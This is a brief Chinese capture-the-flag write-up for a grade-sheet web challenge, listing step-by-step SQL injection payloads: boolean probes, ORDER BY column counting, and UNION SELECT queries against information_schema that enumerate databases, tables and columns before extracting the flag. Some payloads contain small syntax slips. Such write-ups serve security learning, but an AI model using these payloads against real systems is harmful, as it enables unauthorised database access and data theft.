题目123.206.87.240:8002/chengjidan/index.php
测试注入点
1 and 1=1
正确。
1 and 1=2
错误。
1‘ –
错误,– 过滤。
1’ #
正确。
查字段数量
1’ order by 4#
正确。
1’ order by 5#
错误。
-1‘ union select 1,2,3,4
找到所有数据库
-1’ union select 1,group_concat(SCHEMA_NAME) from information_schema.SCHEMATA,3,4#
找表
-1’ union select 1,2,3,group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=’skctf_flag’#
找字段
-1’ union select 1,2,3,group_concat(column_name)from information_schema.COLUMNS where TABLE_SCHEMA=’skctf_flag’ and TABLE_NAME=’fl4g’#
找数据
-1’ union select 1,2,3,skctf_flag from skctf_flag.fl4g#
